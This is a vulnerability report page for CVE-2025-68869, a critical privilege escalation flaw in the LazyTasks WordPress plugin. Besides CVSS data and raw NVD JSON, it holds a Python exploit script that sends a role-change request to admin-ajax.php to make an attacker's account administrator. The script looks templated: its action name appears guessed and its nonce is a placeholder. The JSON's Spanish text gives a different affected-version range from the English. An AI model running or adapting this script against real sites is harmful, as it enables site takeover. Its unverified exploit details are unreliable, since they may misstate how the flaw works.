Security Vulnerability Report
中文
CVE-2025-68869 CVSS 9.8 CRITICAL

CVE-2025-68869

Published: 2026-01-22 17:16:12
Last Modified: 2026-04-15 00:35:42

Description

Incorrect Privilege Assignment vulnerability in LazyCoders LLC LazyTasks lazytasks-project-task-management allows Privilege Escalation.This issue affects LazyTasks: from n/a through <= 1.2.37.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

LazyTasks WordPress Plugin <= 1.2.37

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68869 LazyTasks Privilege Escalation PoC # Target: WordPress with LazyTasks plugin <= 1.2.37 def exploit_lazytasks(target_url, attacker_id, target_role='administrator'): """ Exploit Incorrect Privilege Assignment in LazyTasks plugin Args: target_url: Target WordPress site URL attacker_id: User ID to escalate (usually attacker controlled account) target_role: Role to assign (default: administrator) """ # Step 1: Get valid nonce by accessing admin page session = requests.Session() # Step 2: Exploit the privilege assignment vulnerability exploit_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Craft malicious request to assign administrator role payload = { 'action': 'lazytasks_update_user_role', 'user_id': attacker_id, 'new_role': target_role, 'nonce': 'bypass_nonce_here' # Nonce bypass or extract from page } try: response = session.post(exploit_endpoint, data=payload, timeout=10) if response.status_code == 200: # Verify privilege escalation verify_url = f"{target_url}/wp-admin/users.php" verify_resp = session.get(verify_url) if target_role in verify_resp.text: print(f"[!] SUCCESS: Privilege escalation to {target_role} achieved!") return True print("[-] Exploitation failed or patch applied") return False except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <user_id>") print(f"Example: python {sys.argv[0]} http://example.com 2") sys.exit(1) target = sys.argv[1] user_id = sys.argv[2] exploit_lazytasks(target, user_id)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68869", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:12.293", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect Privilege Assignment vulnerability in LazyCoders LLC LazyTasks lazytasks-project-task-management allows Privilege Escalation.This issue affects LazyTasks: from n/a through <= 1.2.37."}, {"lang": "es", "value": "Vulnerabilidad de Asignación Incorrecta de Privilegios en LazyCoders LLC LazyTasks lazytasks-project-task-management permite la escalada de privilegios. Este problema afecta a LazyTasks: desde n/d hasta &lt;= 1.4.01."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/lazytasks-project-task-management/vulnerability/wordpress-lazytasks-plugin-1-2-37-privilege-escalation-vulnerability?_s_id=cve", "source": "[email protected]"}]}}